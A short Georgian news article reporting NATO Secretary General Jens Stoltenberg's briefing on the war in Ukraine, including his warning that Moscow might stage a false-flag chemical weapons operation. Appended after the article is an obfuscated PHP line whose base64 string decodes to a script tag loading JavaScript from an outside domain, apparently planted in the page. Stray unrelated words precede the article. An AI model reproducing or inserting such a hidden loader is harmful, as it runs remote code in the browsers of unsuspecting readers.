celsiusi
ავერსი შნაიდერი
ჩრდილო-ატლანტიკური ალიანსის გენერალურმა მდივანმა იენს სტოლტენბერგმა დღეს გამართულ ბრიფინგზე უკრაინაში შექმნილ ვითარებასა და უკრაინაში მიმდინარე იმზე ისაუბრა. 
 
მისი თქმით, არ არის გამორიცხული რომ მოსკოვმა ქიმიური იარაღი გამოიყენოს:
 
"ჩვენ შეწუხებული ვართ, რომ მოსკოვმა შესაძლოა ცრუ ოპერაცია დაიწყოს, რომელიც მოიცავს ქიმიურ იარაღს," - აღნიშნა სტოლტენბერგმა.
 
ალიანსის ხელმძღვანელი ამბობს, რომ NATO აგრძელებს უკრაინის მხარდაჭერას:
 
"უკრაინელი ხალხი იცავს თავის სახლებს და მომავალს და ჩვენ მათ მხარი უნდა დავუჭიროთ. ხვალ ჩვენ შემოგვიერთდება უკრაინის თავდაცვის მინისტრი და ჩვენი ძველი პარტნიორები საქართველოდან, ფინეთიდან, შვედეთიდან და ევროკავშირიდან. მთელმა სამყარომ დაგმო ეს ომი. ნატო და ევროკავშირმა უპრეცედენტო სანქციები დაუწესეს რუსეთს. წლების განმავლობაში NATO ათი ათასობით უკრაინელ სამხედროს წვრთნიდა, უმეტესობა მათგანი დღეს ფრონტის ხაზზე იბრძვის. ეს წვრთნები და სამხედრო დახმარება აძლევს საშუალებას უკრაინას თავი დაიცვას. NATO-ს წევრები ყოველთვის დაეხმარება უკრაინას ფინანსური, სამხედრო და ჰუმანიტარული დახმარებით," - განაცხადა იენს სტოლტენბერგმა.
 
სტოლტენბერგის თქმით, შექმნილი სიტუაციიდან გამომდინარე NATO სრულ მზადყოფნაშია და  ალიანსი მომავალ წლებში თავდაცვის კიდევ უფრო გაძლიერებას გეგმავს.
 
839
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");